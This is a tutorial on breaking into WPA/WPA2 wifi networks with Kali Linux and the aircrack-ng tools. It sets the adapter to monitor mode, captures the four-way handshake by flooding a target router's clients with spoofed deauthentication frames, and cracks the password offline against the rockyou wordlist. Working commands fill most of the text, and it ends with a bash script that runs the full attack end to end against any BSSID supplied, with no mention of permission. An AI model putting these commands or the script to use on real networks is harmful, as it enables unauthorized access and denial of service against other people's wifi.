A quick preview of what we’ll be doing:
- Checking if our wireless card supports monitor mode – this method works by sniffing traffic in monitor mode, so if your wifi card doesn’t support it, you can’t attack the wifi this way.
- Put Kali Linux in monitor mode – in monitor mode the adapter passes us every frame it hears on the channel, not just the ones addressed to us.
- Capture the handshake – when a computer or phone joins a WPA/WPA2 network, it and the router perform a four-way handshake. Capturing this handshake is essential, because the cracking step works on the handshake rather than on the router.
- Crack the password – using a password list, we run a dictionary attack: each candidate password in the list is tested offline against the captured handshake.
Step 1: Check if your card supports monitor mode
Before we do anything, you need to make sure that your wifi adapter supports monitor mode. To do this, open a terminal and type
iw list
and look for “monitor” under “Supported interface modes.”
As you can see, my wifi card has “monitor” listed there. If your card doesn’t, you will need to buy a USB wifi adapter that supports monitor mode (and, for the deauth step later, packet injection) before you can follow this tutorial.
Step 2: Put Kali Linux in monitor mode and view traffic
Open up a terminal and type in
airmon-ng start wlan0
to put your adapter into monitor mode; airmon-ng creates a new interface called wlan0mon for it. airmon-ng will usually warn about processes such as NetworkManager and wpa_supplicant that interfere with monitor mode. Stop them with
airmon-ng check kill
and then run the start command again. Keep in mind that this kills your normal wifi connection until you restart those services.
We can check that we are in monitor mode by listing the wireless interfaces again. We see that wlan0mon is listed among our wifi devices.
To see all traffic in range, type in
airodump-ng wlan0mon
This lists every access point airodump-ng hears, with its BSSID (MAC address), channel and ESSID, which is exactly what we need for the next step.
Step 3: Capture the traffic and find the handshake
In order to capture the handshake, we need to isolate the traffic on one router. We can do this by noting the BSSID of the router and the channel that it is communicating on. Type in
airodump-ng --bssid [BSSID of router] -c [channel of the router] --write [name of the file to write data to] wlan0mon
In this case, we’re going to try to find the password for the router with SSID “mayhem.” Run this in its own terminal and leave it running; the handshake has to arrive while airodump-ng is writing to the file.
Next, we are going to capture the handshake by forcing clients off the network. When they reconnect, airodump-ng records the handshake.
To force clients off, we send a burst of deauthentication frames that spoof the router’s address. This is a denial of service against that one network (not a DDoS, since it comes from a single machine). In a second terminal, type in
aireplay-ng --deauth 100 -a [BSSID of router] wlan0mon
This sends 100 deauthentication frames that appear to come from the router, addressed to every client, so all of them drop off. You can send as many as you want (a count of 0 keeps sending until you stop it), but 100 should be enough for smaller networks. This step only works if your adapter supports packet injection.
Once the clients we kicked off reconnect, airodump-ng captures the four-way handshake and shows “WPA handshake: [BSSID]” at the top right of its window.
Step 4: Crack the password
Cracking is an offline dictionary attack: aircrack-ng derives the key that each candidate password would produce and checks it against the captured handshake. Nothing is sent to the router, so it cannot lock us out or notice the attempts. We need a password list for this, and luckily Kali comes with several. We can navigate to /usr/share/wordlists to see them.
cd /usr/share/wordlists
ls
The largest one, rockyou.txt, is shipped compressed as rockyou.txt.gz and has to be decompressed before aircrack-ng can read it.
To run the password list against the capture, type in
aircrack-ng [Name of file]-01.cap -w /usr/share/wordlists/[path to password list to use]
airodump-ng appends -01 to the name you gave with --write (and -02, -03 on later runs), so use the actual file name. If the capture contains a handshake and the router’s password is in the list, aircrack-ng prints “KEY FOUND!” together with the password.
If the password wasn’t found, that means that the password wasn’t in the list you provided. You can run another one that came with Kali Linux, or download a password list from the internet.
This GitHub repository has a lengthy list of them.
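The four steps above as a single bash script, added here as an example and not code from the original post. It assumes bash, sudo, `iw` and the aircrack-ng suite on a Kali box; the `iw list` parsing relies on the “Supported interface modes:” block the text quotes, the 60-second capture window and 10 deauth frames are arbitrary choices, and the BSSID, channel, prefix and wordlist in the usage line are placeholders. The helpers are separated from the live attack so they can be checked on constructed `iw list` output without touching a radio.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): the Steps 1-4 workflow as one
# script. Assumes bash, sudo, iw and the aircrack-ng suite are installed.
set -eu

# Step 1. Read `iw list` output on stdin; return 0 only if "monitor" appears
# under "Supported interface modes:" (the block the tutorial quotes).
supports_monitor_mode() {
    awk '
        /Supported interface modes:/  { in_modes = 1; next }
        in_modes && /^[[:space:]]*\*/ { if ($0 ~ /monitor/) found = 1; next }
        in_modes                      { in_modes = 0 }
        END                           { exit found ? 0 : 1 }
    '
}

# Step 4 helper. Kali ships rockyou as rockyou.txt.gz; aircrack-ng wants plain
# text, so decompress once next to the archive and print the plain path.
prepare_wordlist() {
    local list="$1" plain
    case "$list" in
        *.gz)
            plain="${list%.gz}"
            [ -f "$plain" ] || gunzip -c "$list" > "$plain"
            printf '%s\n' "$plain" ;;
        *)  printf '%s\n' "$list" ;;
    esac
}

# airodump-ng --write PREFIX produces PREFIX-01.cap, PREFIX-02.cap, ... on
# repeated runs; pick the newest so the cracking step gets a real file name.
latest_capture() {
    ls -1 "$1"-[0-9][0-9].cap 2>/dev/null | sort | tail -n 1
}

# Steps 1-4 end to end. Arguments: interface, target BSSID, channel, capture
# prefix, wordlist. The 60 s window and 10 deauth frames are assumptions.
run_attack() {
    local iface="$1" bssid="$2" channel="$3" prefix="$4" wordlist="$5"
    local mon="${iface}mon" cap

    iw list | supports_monitor_mode || { echo "$iface: no monitor mode support" >&2; return 1; }

    sudo airmon-ng check kill        # stops NetworkManager/wpa_supplicant; drops your wifi
    sudo airmon-ng start "$iface"    # creates ${iface}mon

    # Step 3: dump only the target AP on its channel, in the background ...
    sudo timeout 60 airodump-ng --bssid "$bssid" -c "$channel" --write "$prefix" "$mon" &
    sleep 5
    # ... then deauth its clients so they reconnect and the 4-way handshake is recorded.
    sudo aireplay-ng --deauth 10 -a "$bssid" "$mon"
    wait || true                     # timeout exits 124 when it stops airodump-ng

    sudo airmon-ng stop "$mon"
    cap=$(latest_capture "$prefix")
    [ -n "$cap" ] || { echo "no capture file for $prefix" >&2; return 1; }

    # Step 4: offline dictionary attack against the captured handshake.
    sudo aircrack-ng -w "$(prepare_wordlist "$wordlist")" -b "$bssid" "$cap"
}

# Usage (placeholder values):
#   ./wifi-crack.sh run wlan0 AA:BB:CC:DD:EE:FF 6 mayhem /usr/share/wordlists/rockyou.txt.gz
if [ "${1:-}" = run ]; then
    shift
    run_attack "$@"
fi
```

After `airmon-ng check kill` your normal connection stays down until NetworkManager and wpa_supplicant are started again, so run this from a machine whose only job is the capture. If aircrack-ng reports no handshake in the file, repeat the capture with a longer window rather than a longer wordlist.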
- We used Kali Linux to attack a WPA/WPA2 wifi router (Kali is free to download if you don’t already have it).
- We used airmon-ng, airodump-ng, and aireplay-ng to enter monitor mode, watch the wifi traffic, and capture the handshake.
- Finally, we used aircrack-ng to test each password in a password list against the captured handshake offline, eventually finding the password.